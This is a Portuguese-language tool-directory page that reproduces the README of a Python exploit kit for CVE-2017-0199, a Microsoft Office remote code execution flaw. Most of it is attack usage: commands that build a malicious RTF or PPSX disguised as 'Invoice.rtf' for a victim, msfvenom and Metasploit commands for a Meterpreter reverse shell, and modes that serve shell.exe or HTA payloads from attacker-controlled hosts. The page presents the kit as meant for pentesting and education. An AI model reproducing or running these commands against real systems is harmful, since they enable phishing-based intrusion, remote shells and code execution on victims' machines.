Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-0199 — Kit de exploração em Python para CVE-2017-0199 (RCE do Microsoft Office) que gera arquivos RTF/PPSX maliciosos e entrega payloads do Metasploit ou personalizados às vítimas. | Kitploit
Ferramentas/GitHubGitHub/phantomlancer123/cve-2017-0199
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubphantomlancer123/cve-2017-0199

CVE-2017-0199

Kit de exploração em Python para CVE-2017-0199 (RCE do Microsoft Office) que gera arquivos RTF/PPSX maliciosos e entrega payloads do Metasploit ou personalizados às vítimas.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 8 anosAinda não revisado

Exploit toolkit CVE-2017-0199 - v4.0

Exploit toolkit CVE-2017-0199 - v4.0 é um script Python prático que fornece a pentesters e pesquisadores de segurança uma maneira rápida e eficaz de testar o RCE do Microsoft Office. Ele pode gerar um arquivo RTF/PPSX malicioso e entregar metasploit / meterpreter / outros payloads à vítima sem qualquer configuração complexa.

Aviso Legal

Este programa é apenas para fins educacionais. Não o utilize sem permissão. A isenção de responsabilidade padrão se aplica, especialmente o fato de que eu (bhdresh) não me responsabilizo por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso indevido destes programas ou de seus derivados. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.

Por fim, este é um desenvolvimento pessoal, respeite sua filosofia e não o use para más intenções!

Licença

Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

Nota de lançamento:

Foram introduzidas as seguintes capacidades ao script

root@kitploit:~
- Gerar arquivo PPSX malicioso
- Modo de exploração para arquivo PPSX gerado
- template.ppsx atualizado

Versão: Python versão 2.7.13

Cenário 1: Entregar payload local

Comandos de exemplo
root@kitploit:~
1) Gerar arquivo RTF malicioso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Opcional, se usar MSF Payload): Gerar payload metasploit e iniciar handler
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar toolkit no modo de exploração para entregar payload local
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Diagrama de sequência

alt tag

Cenário 2: Entregar payload remoto

Comandos de exemplo
root@kitploit:~
1) Gerar arquivo RTF malicioso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Iniciar toolkit no modo de exploração para entregar payload remoto
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Diagrama de sequência

alt tag

Cenário 3: Entregar arquivo HTA personalizado

Comandos de exemplo
root@kitploit:~
1) Gerar arquivo RTF malicioso
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Iniciar toolkit no modo de exploração para entregar arquivo HTA personalizado
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Diagrama de sequência

alt tag

Argumentos da linha de comando:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Este é um toolkit útil para explorar o CVE-2017-0199 (RCE do Microsoft Office)

Modos:

-M gen                                          Gerar apenas arquivo malicioso

     Gerar arquivo RTF/PPSX malicioso:

      -w <Filename.rtf/Filename.ppsx>     Nome do arquivo RTF/PPSX malicioso (Compartilhe este arquivo com a vítima).

      -u <http://attacker.com/test.hta>   O caminho para um arquivo HTA/SCT. Normalmente, deve ser um domínio ou IP onde esta                                          ferramenta está em execução.
                                      Por exemplo, http://attackerip.com/test.doc (Esta URL será incluída no                                               arquivo RTF/PPSX malicioso e será solicitada assim que a vítima abrir o arquivo RTF malicioso.
      -t RTF|PPSX (padrão = RTF)         Tipo do arquivo a ser gerado.
      -x 0|1  (padrão = 0)               Gerar arquivo RTF ofuscado. 0 = Desativar, 1 = Ativar.

				      
-M exp                                          Iniciar modo de exploração

     Exploração:
 
      -t RTF|PPSX (padrão = RTF)         Tipo de arquivo a ser explorado.
      -H </tmp/custom>                Caminho local de um arquivo HTA/SCT personalizado que deve ser entregue e executado no alvo.
                                          NOTA: Esta opção não entregará payloads especificados através das opções "-e" e "-l"
					  
      -p <TCP port:Default 80>            Número da porta local.

      -e <http://attacker.com/shell.exe>  O caminho de um arquivo executável / shell meterpreter / payload que deve ser executado no alvo.

      -l </tmp/shell.exe>                 Se o payload estiver hospedado localmente, especifique o caminho local de um arquivo executável / shell meterpreter / payload.

Crédito

@nixawk pela amostra RTF, @Li Haifei, @bhdresh

Bug, problemas, solicitações de funcionalidades

Obviamente, não sou um desenvolvedor em tempo integral, então espere alguns contratempos

Por favor, reporte bugs e problemas através de https://github.com/bhdresh/CVE-2017-0199/issues/new

Baixar ferramenta